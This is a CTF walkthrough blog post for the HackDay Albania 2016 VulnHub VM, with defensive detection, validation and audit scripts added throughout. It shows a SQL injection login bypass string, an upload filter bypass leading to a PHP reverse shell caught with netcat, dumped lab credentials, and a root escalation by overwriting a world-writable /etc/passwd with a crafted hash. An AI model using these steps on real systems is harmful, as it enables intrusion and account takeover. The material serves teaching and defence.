18 January 2022

Pentesting Fun Stuff

following the cyber security path…

HackDay CTF 2016 (Albania)

Location

https://download.vulnhub.com/hackday/HackDay-Albania.ova

Introduction

Hack Day Albania is the event that brings together students passionate about cyber security. This activity is organized for the second consecutive year by ALCIRT with the support of MIAP.

Getting Started

Starting with an nmap scan.

┌─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-28 09:46 CET
Nmap scan report for 192.168.171.3
Host is up (0.00023s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.171.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

There is no usable banner information on port 22, so I check the website on port 8008.

[screenshot: website01]

The nmap scan showed that the site has a 'robots.txt' with a long list of restricted pages.
Because I don't speak Albanian, I let Google translate the text on the page: If I am, I know where to go;)
After closing the pop-up box, Elliot from the show Mr. Robot is visible.
First I check the source code. There is a comment at the bottom: OK ok, but not here :)
The background picture didn't have any information hidden in it, so I start with the first directory listed in 'robots.txt'.
Great..... Memes with Albanian text. I hope Google doesn't mess up the translations and point me in the wrong direction.
The translated text on the meme is: Is this the proper directory. Or is it jerk.
Right. After checking the second page it seems I'm being trolled. To automate my search a bit I write a small bash script that cURLs every listed directory for me and saves the HTML. If one of the pages is different, it should stand out in the output.

#!/bin/bash
# Fetch every path listed in the file 'list' (the robots.txt entries) and
# append the HTML to curl.txt; a page that differs from the meme pages stands out.
while read -r x; do
  curl -s "192.168.171.3:8008/$x" >> curl.txt
done < list
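From the defender's side, a sweep like the one this script performs is easy to spot in the Apache access log: a single client requesting many of the robots.txt-disallowed directories within seconds. The following Python script is an added example (not part of the original post) that flags such clients. The log lines it runs on are constructed for the example; only the directory names come from the nmap output above, and the threshold and time window are arbitrary choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (not from the original post). The
# directory names are the robots.txt entries from the nmap output; the client
# addresses, timestamps and user agents are made up for this example.
SAMPLE_LOG = """\
192.168.171.2 - - [28/Nov/2016:09:50:01 +0100] "GET /robots.txt HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.171.2 - - [28/Nov/2016:09:50:02 +0100] "GET /rkfpuzrahngvat/ HTTP/1.1" 200 318 "-" "curl/7.50.1"
192.168.171.2 - - [28/Nov/2016:09:50:02 +0100] "GET /slgqvasbiohwbu/ HTTP/1.1" 200 318 "-" "curl/7.50.1"
192.168.171.2 - - [28/Nov/2016:09:50:03 +0100] "GET /tmhrwbtcjpixcv/ HTTP/1.1" 200 318 "-" "curl/7.50.1"
192.168.171.2 - - [28/Nov/2016:09:50:03 +0100] "GET /unisxcudkqjydw/ HTTP/1.1" 200 2114 "-" "curl/7.50.1"
192.168.171.10 - - [28/Nov/2016:09:55:10 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.171.10 - - [28/Nov/2016:09:55:11 +0100] "GET /rkfpuzrahngvat/ HTTP/1.1" 200 318 "-" "Mozilla/5.0"
"""

# The disallowed paths as the site operator reads them from robots.txt
# (a subset of the 26 entries, enough for the sample).
DISALLOWED = {"/rkfpuzrahngvat/", "/slgqvasbiohwbu/", "/tmhrwbtcjpixcv/", "/unisxcudkqjydw/"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_robots_sweeps(log_text, disallowed, threshold=3, window_seconds=60):
    """Return {ip: sorted paths} for clients that requested at least `threshold`
    distinct disallowed paths within `window_seconds` of one of their requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] in disallowed:
            hits[rec["ip"]].append((rec["ts"], rec["path"]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            in_window = {p for t, p in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(in_window) >= threshold:
                flagged[ip] = sorted(in_window)
                break
    return flagged

if __name__ == "__main__":
    for ip, paths in find_robots_sweeps(SAMPLE_LOG, DISALLOWED).items():
        print(f"{ip} swept {len(paths)} disallowed paths: {', '.join(paths)}")
```

On the sample only 192.168.171.2 is flagged; the second client touched a single disallowed directory, which is what a curious human does and not worth an alert.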

[screenshot: vulnbank01]
[screenshot: vulnbank02]
[screenshot: vulnbank03]

When entering a single quote, I get the following error.

[screenshot: vulnbank04]

Looks like a SQLi vulnerability. At first I tried SQLMap, but it couldn't retrieve the databases. I then searched the internet for information about SQL authentication bypass and found a nice list which I could load into Burp Suite. Unfortunately I couldn't get that to work either, but the idea of the list sounded good, so I started probing manually and after some time (a lot) I got in using the string '%1#.
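What makes this bypass possible is a login query assembled by string concatenation, combined with the database's error text being shown to the user. The following Python snippet is an added example, not the VM's PHP code: it rebuilds the klienti table from the MySQL dump further down this page in an in-memory SQLite database and contrasts a concatenated query with a parameterised one. One caveat: SQLite and MySQL parse the page's string differently. On MySQL, which this VM runs, # starts a comment and ''%1 evaluates to 0, and MySQL's loose comparison of a text column against the number 0 matches any non-numeric value, which is why the string logs in. SQLite has no # comment, so the same input just produces the kind of syntax error the screenshot shows. The parameterised version returns no row for either input on any database.

```python
import sqlite3

# Constructed stand-in for the bank's 'klienti' table: the column names and the
# two rows are the ones in the MySQL dump further down this page.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE klienti (ID INTEGER, emer TEXT, mbiemer TEXT, "
        "bilanci INTEGER, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO klienti VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Charles D.", "Hobson", 25000, "hobson", "Charles123"),
        (2, "Jeffery", "Fischer", 120000, "jeff", "jeff321"),
    ])
    return conn

def login_vulnerable(conn, username, password):
    """Concatenated query: quotes in the input become part of the SQL."""
    sql = (f"SELECT ID, username FROM klienti "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchone()

def login_safe(conn, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT ID, username FROM klienti WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()

def attempt(login_fn, conn, username, password):
    """Run a login function and classify the outcome as 'row', 'none' or 'error'.
    Returning the raw DB error text is the disclosure the screenshot above shows;
    a production app would log it and show the user a generic message."""
    try:
        row = login_fn(conn, username, password)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("row", row) if row else ("none", None)

if __name__ == "__main__":
    db = build_db()
    for user, pw in [("hobson", "Charles123"), ("hobson", "'"), ("hobson", "'%1#")]:
        print(f"{pw!r:14} vulnerable -> {attempt(login_vulnerable, db, user, pw)}")
        print(f"{'':14} safe       -> {attempt(login_safe, db, user, pw)}")
```

The fix in the real application is the same regardless of database: bind user input as parameters (mysqli or PDO prepared statements in PHP), and never hand the database's error message to the browser.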
[screenshot: vulnbank05]

An upload mechanism. First I try to upload a PHP file containing phpinfo().

[screenshot: lfi01]

To bypass the check I change the filename and MIME type with Burp Suite.

[screenshot: lfi02]

When I view the ticket I see that the code is being executed.

[screenshot: lfi03]

Time for a reverse shell. I use the PHP reverse shell script from pentestmonkey and upload it to the server. Viewing the 'ticket' in the browser executes the script and I have my reverse shell.
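The upload check that was bypassed here trusts two things the client controls: the filename extension and the Content-Type header. The following Python function is an added example of how the server side can decide on the file's bytes instead; it is not the VM's code, and the allow-list (PNG and JPEG only), the constructed samples and the helper names are assumptions made for the example.

```python
import os
import secrets

# Magic bytes for the file types the ticket system is assumed to accept; the
# real application's allow-list is not shown on this page (assumption).
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}
EXT_TO_KIND = {"png": "png", "jpg": "jpg", "jpeg": "jpg"}
PHP_TAGS = (b"<?php", b"<?=")

def validate_upload(filename, claimed_type, data):
    """Decide on an upload from its bytes. Returns (accepted, reason, stored_name).
    claimed_type is only echoed in messages; it is never trusted for the decision."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in EXT_TO_KIND:
        return (False, f"extension '.{ext}' is not on the allow-list", None)
    kind = EXT_TO_KIND[ext]
    if not data.startswith(SIGNATURES[kind]):
        return (False, f"content is not a {kind} (client claimed {claimed_type})", None)
    if any(tag in data for tag in PHP_TAGS):
        # A real image header followed by PHP is still PHP to a misconfigured server.
        return (False, "PHP tag embedded in image data", None)
    # Server-chosen name with a fixed extension: the user's filename never reaches disk.
    return (True, "accepted", f"{secrets.token_hex(16)}.{kind}")

# Constructed samples: a minimal PNG header, and the phpinfo() probe from this
# post presented with an image name and MIME type, as the Burp bypass does.
GOOD_PNG = SIGNATURES["png"] + b"\x00" * 32
PHP_PROBE = b"<?php phpinfo(); ?>"
POLYGLOT = SIGNATURES["png"] + b"\x00" * 8 + PHP_PROBE

if __name__ == "__main__":
    for name, ctype, body in [("photo.png", "image/png", GOOD_PNG),
                              ("info.php", "application/x-php", PHP_PROBE),
                              ("info.png", "image/png", PHP_PROBE),
                              ("info.png", "image/png", POLYGLOT)]:
        ok, why, stored = validate_upload(name, ctype, body)
        print(f"{name:10} {ctype:18} -> {'ACCEPT' if ok else 'REJECT'}: {why}")
```

Even an accepted file should land in a directory the web server will not execute: outside the document root, or with PHP handling disabled for that directory in the Apache configuration. That second layer is what turns a missed validation case into a harmless download instead of the code execution seen in the screenshot.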

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 34432
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 18:22:55 up  8:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 2: python: not found
$ whereis python
python: /usr/bin/python3.5m /usr/bin/python3.5 /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@hackday:/$

Now for some reconnaissance.

www-data@hackday:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@hackday:/$ uname -a
uname -a
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ cat config.php | more
<?php
-----[SNIP]-----
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
-----[SNIP]-----
www-data@hackday:/$ netstat -l
netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:mysql         *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp6       0      0 [::]:8008               [::]:*                  LISTEN
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN
www-data@hackday:/$ mysql --host=localhost --user=root --password=NuCiGoGo321 bank_database
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 5.7.12-0ubuntu1.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| bank_database      |
| mysql              |
| performance_schema |
| sys                |
| vulnbank           |
+--------------------+
6 rows in set (0.00 sec)
mysql> use bank_database
use bank_database
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bank_database |
+-------------------------+
| klienti                 |
| tickets                 |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from klienti;
select * from klienti;
+----+-------------+---------+---------+----------+------------+
| ID | emer        | mbiemer | bilanci | username |  password  |
+----+-------------+---------+---------+----------+------------+
| 1  | Charles D.  | Hobson  | 25000   | hobson   | Charles123 |
| 2  | Jeffery     | Fischer | 120000  | jeff     | jeff321    |
+----+-------------+---------+---------+----------+------------+
2 rows in set (0.00 sec)
www-data@hackday:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ ls -lah /etc | grep passwd
ls -lah /etc | grep passwd
-rw-r--rw-  1 root root   1.6K Oct 22 17:21 passwd
www-data@hackday:/etc$ ls -lah /home/taviso
ls -lah /home/taviso
total 32K
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .
drwxr-xr-x 3 root   root   4.0K Oct  9 13:13 ..
-rw------- 1 root   root     17 Oct 29 23:07 .bash_history
-rw-r--r-- 1 taviso taviso  220 Oct  9 13:13 .bash_logout
-rw-r--r-- 1 taviso taviso 3.7K Oct  9 13:13 .bashrc
drwx------ 2 taviso taviso 4.0K Oct  9 13:16 .cache
drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano
-rw-r--r-- 1 taviso taviso  655 Oct  9 13:13 .profile
-rw-r--r-- 1 taviso taviso    0 Oct 29 23:07 .sudo_as_admin_successful
www-data@hackday:/$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

So 'taviso' is in the sudo group and /etc/passwd is world-writable (-rw-r--rw-), which means any user can write a password hash straight into its second field.
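Both findings (a world-writable /etc/passwd and an account with sudo rights) are exactly what a host audit should raise before anyone gets this far. The following Python script is an added example, not something from the original post: it parses passwd entries and flags hashes stored in the second field (they belong in /etc/shadow), empty password fields and extra UID-0 accounts, and separately checks the file mode for group or world write bits. The sample entries are constructed from the lines shown on this page, including the taviso entry as it looks after the hash has been written into it further down.

```python
import os
import stat

# Constructed /etc/passwd sample based on the entries shown on this page:
# root, www-data, and the taviso entry after a hash was written into field 2.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
"""

def audit_passwd_entries(text):
    """Return [(username, finding)] for entries a healthy system should not have."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append((user, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "additional UID 0 account"))
    return findings

def parse_ls_mode(mode_str):
    """Turn an ls-style mode such as '-rw-r--rw-' (as shown above) into permission bits.
    Lowercase r/w/x/s/t set the bit; '-' and uppercase S/T (setuid/sticky without
    execute) leave it clear."""
    bits = 0
    for i, ch in enumerate(mode_str[1:10]):
        if ch in "rwxst":
            bits |= 1 << (8 - i)
    return bits

def audit_passwd_mode(mode_bits):
    """/etc/passwd must be writable by root only; flag group or world write bits."""
    findings = []
    if mode_bits & stat.S_IWGRP:
        findings.append("group-writable")
    if mode_bits & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

if __name__ == "__main__":
    for user, finding in audit_passwd_entries(SAMPLE_PASSWD):
        print(f"[entry] {user}: {finding}")
    for finding in audit_passwd_mode(parse_ls_mode("-rw-r--rw-")):
        print(f"[mode ] /etc/passwd is {finding}")
    # The same checks against the live file on the host running the script.
    if os.path.exists("/etc/passwd"):
        with open("/etc/passwd") as f:
            live = audit_passwd_entries(f.read())
        live_mode = audit_passwd_mode(stat.S_IMODE(os.stat("/etc/passwd").st_mode))
        print(f"[live ] {len(live)} entry finding(s), mode findings: {live_mode or 'none'}")
```

On the sample the script reports the taviso hash and the world-writable mode. A file integrity monitor (AIDE, Tripwire, auditd watching /etc/passwd for writes) catches the modification itself the moment it happens, which is earlier than a periodic audit.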

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $mkpasswd --method=sha-512 password
$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1
www-data@hackday:/$ sed -e 's/taviso:x/taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd
www-data@hackday:/$ cp /tmp/passwd /etc/passwd
cp /tmp/passwd /etc/passwd
www-data@hackday:/$ cat /etc/passwd | grep taviso
cat /etc/passwd | grep taviso
taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ su taviso
su taviso
Password: password
taviso@hackday:/$ sudo -l
sudo -l
Matching Defaults entries for taviso on hackday:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
 (ALL : ALL) ALL
taviso@hackday:/$ sudo su
sudo su
root@hackday:/# cd /root
cd /root
root@hackday:~# ls -lah
ls -lah
total 28K
drwx------ 3 root root 4.0K Oct 22 17:21 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
-rw------- 1 root root 58 Oct 22 17:21 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
drwxr-xr-x 2 root root 4.0K Oct 9 13:18 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
root@hackday:~# cat flag.txt
cat flag.txt
Urime,
Tani nis raportin!
d5ed38fdbf28bc4e58be142cf5a17cf5

And that's it. The last part says: Congratulations, now begin the report! (or at least that's what Google makes of it).
The flag is an MD5 hash; its plaintext is 'rio'.

THE END
